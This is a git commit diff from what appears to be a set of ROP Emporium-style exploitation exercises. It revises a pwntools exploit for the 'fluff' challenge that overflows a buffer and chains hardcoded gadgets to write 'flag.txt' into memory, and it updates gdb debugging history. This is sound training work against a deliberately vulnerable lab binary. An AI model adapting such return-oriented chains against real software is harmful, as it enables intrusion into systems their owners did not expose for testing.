deleted: x86_64/badchars/core

modified: x86_64/fluff/.gdb_history deleted: x86_64/fluff/core modified: x86_64/fluff/exploit.py deleted: x86_64/ret2win/core deleted: x86_64/split/core deleted: x86_64/write4/core
2020-12-18 01:42:14 -06:00 · 2020-12-18 01:42:14 -06:00 · 406768c5fe
commit 406768c5fe
parent 4c25bd9188
7 changed files with 46 additions and 31 deletions
--- a/x86_64/badchars/core
+++ b/x86_64/badchars/core
--- a/x86_64/fluff/.gdb_history
+++ b/x86_64/fluff/.gdb_history
@ -1,19 +1,4 @@
 quit
-quit
-continue
-nexti
-nexti
-info reg rdi
-stepi
-nexti
-info reg rcx
-nexti
-info reg rbx
-stepi
-info reg rdx
-inro reg rbx
-info reg rbx
-quit
 stepi
 continue
 stepi
@ -237,3 +222,35 @@ x/x 0x601be0 + 8
 x/x 0x601be0 + 9
 x/x 0x601be0 + 10
 quit
+continue
+context
+x/x 0x7fff0b74fed0
+x/100x 0x7fff0b74fed0
+quit
+break *0x400639
+continue
+context
+continue
+x/s 0x601be0
+continue
+x/s 0x601be0
+stepi
+stepi
+x/s 0x601be0
+quit
+continue
+continue
+quit
+break *0x00000000004006a3
+continue
+continue
+quit
+break pwnme
+run
+continue
+break *0x00000000004006a3
+continue
+info reg rip
+continue
+info reg rip
+quit
--- a/x86_64/fluff/core
+++ b/x86_64/fluff/core
--- a/x86_64/fluff/exploit.py
+++ b/x86_64/fluff/exploit.py
@ -13,37 +13,35 @@ letter_lookups = {
 def write_str(dest, string, payload):
    payload += p64(0x00000000004006a3)
    payload += p64(dest)
-    for c in string:
-        payload += p64(0x40062a)
-        payload += p64(0x4000) # if things go wrong, check endian/order
+    payload += p64(0x0000000000400610)
+    payload += p64(1)
+    payload += p64(0x40062a)
+    payload += p64(0x4000)
+    payload += p64(letter_lookups[string[0]] - 0x3ef2)
+    payload += p64(0x400628)
+    payload += p64(0x400639)
+
+    
+    for c in string[1:]:
+        payload += p64(0x40062b)
        payload += p64(letter_lookups[c] - 0x3ef2)
-
        payload += p64(0x0000000000400610)
-        payload += p64(0)
-
+        payload += p64(1)
        payload += p64(0x400628)
-
        payload += p64(0x400639)

    return(payload)
        

-prog = gdb.debug('./fluff', gdbscript='''
-break *pwnme + 151
-'''
-)
+prog = process('./fluff')
 payload = b''
 for c in range(40):
    payload += b'a'

 payload = write_str(0x0000000000600df0 + 0x00000df0, 'flag.txt', payload)
 payload += p64(0x00000000004006a3)
-payload += p64(0x601be0) # set rdi
-
+payload += p64(0x601be0) 
 payload += p64(0x0000000000400510)

-payload += b"\n"
 prog.sendline(payload)
-sleep(1)
-print(str(prog.recv(), 'UTF-8'))
 prog.interactive()
--- a/x86_64/ret2win/core
+++ b/x86_64/ret2win/core
--- a/x86_64/split/core
+++ b/x86_64/split/core
--- a/x86_64/write4/core
+++ b/x86_64/write4/core